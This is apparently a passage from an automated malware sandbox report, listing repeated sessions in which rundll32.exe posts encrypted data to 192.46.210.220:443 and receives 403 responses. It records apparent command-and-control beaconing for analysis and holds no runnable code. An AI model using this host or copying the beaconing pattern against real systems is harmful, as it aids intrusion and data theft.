                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:48 UTC148OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:48 UTC153INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:48 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        31192.168.2.349880192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:49 UTC153OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:49 UTC153OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:49 UTC158INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:49 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        32192.168.2.349886192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:51 UTC158OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:51 UTC158OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:52 UTC162INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:52 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        33192.168.2.349888192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:53 UTC163OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:53 UTC163OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:54 UTC167INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        34192.168.2.349894192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:57 UTC168OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:57 UTC168OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:58 UTC172INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:58 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        35192.168.2.349896192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:04:58 UTC172OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:04:58 UTC173OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:04:59 UTC177INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:04:59 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        36192.168.2.349902192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:01 UTC177OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:01 UTC178OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:02 UTC182INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:01 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        37192.168.2.349904192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:02 UTC182OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:02 UTC182OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:03 UTC187INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:03 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        38192.168.2.349912192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:05 UTC187OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:05 UTC187OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:05 UTC192INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:05 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        39192.168.2.349917192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:06 UTC192OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:06 UTC192OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:06 UTC197INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:06 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.349762192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:03:56 UTC19OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:03:56 UTC19OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:03:57 UTC29INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:03:57 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        40192.168.2.349937192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:09 UTC197OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:09 UTC197OUTData Raw: eb cc f5 4d 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: M#PWLi'Q\ehW"=\I_)"~cP7Y=k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:09 UTC202INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:09 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        41192.168.2.349944192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:10 UTC202OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4802
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 03:05:10 UTC202OUTData Raw: 78 c1 3c 85 10 0c 23 a0 50 b2 57 a3 4c 69 17 c0 e2 a2 27 fa ab ff f5 16 51 12 80 c8 8f 5c ca 18 f6 a4 b9 65 68 57 d9 bf c7 a9 f3 e9 d4 18 95 df a5 b4 22 3d c3 5c 1d 49 5f 29 8b 06 22 13 7e a7 63 a7 9d 50 14 f5 37 95 59 e8 8d 3d 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: x<#PWLi'Q\ehW"=\I_)"~cP7Y=kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 03:05:10 UTC207INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 03:05:10 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        42192.168.2.349960192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 03:05:14 UTC207OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4814
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
